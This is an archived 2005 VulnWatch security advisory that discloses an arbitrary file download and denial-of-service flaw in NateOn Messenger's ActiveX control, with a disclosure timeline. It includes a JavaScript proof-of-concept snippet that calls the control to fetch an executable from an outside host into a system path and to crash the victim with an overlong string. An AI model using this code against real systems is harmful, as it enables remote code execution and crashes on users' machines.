[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

From: saintlinu (saintlinu@private)
Date: Wed Sep 28 2005 - 20:36:27 PDT


Title:             Arbitrary File Download by NateOn Messagener's ActiveX
and DoS

Discoverer:        PARK, GYU TAE (saintlinu@private)

Advisory No.:      NRVA05-08

Critical:          Moderately Critical

Impact:            Arbitrary file download by NateOn Messagener's ActiveX
and DoS

Where:             From remote

Operating System:  Windows Only

Solution:          unpatch yet

Workaround:        N / A

 

Notice:            09. 17. 2005 Initiate notified

                   09. 23. 2005 2nd notified

                   09. 27. 2005 3rd notified

                   09. 29. 2005 Vendor didn't response. Disclosure
vulnerability

 

Description: 

The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on

 

If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX

 

and there is another vulnerability like Buffer Overflow

 

See following detail describe:

 

NOT INCLUDED HERE BUT A PIECE OF CODE

 

<--snip-->

 

             i = GotNate.IsNateonInstall();

             

             if( i == 1 ) {

                           alert('NateOn Messenger already installed. Do
Attack ...');

                           // if you want to second order attack then try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');

                           

                           // if you want to crash to victim system the try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');

             } else {

                           alert('NateOn Messenger NOT Installed');

             }

 

</--snip-->





	

	
		
________________________________________________________
무료 1GB용량!, 더 이상 용량 고민없는 - 야후! 메일 (http://mail.yahoo.co.kr) 
최신 휴대폰 정보, 벨소리, 캐릭터, 문자메세지 - 야후! 모바일 (http://kr.mobile.yahoo.com) 
대한민국 블로그가 모인 곳! - 야후! 피플링(http://kr.ring.yahoo.com)



This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT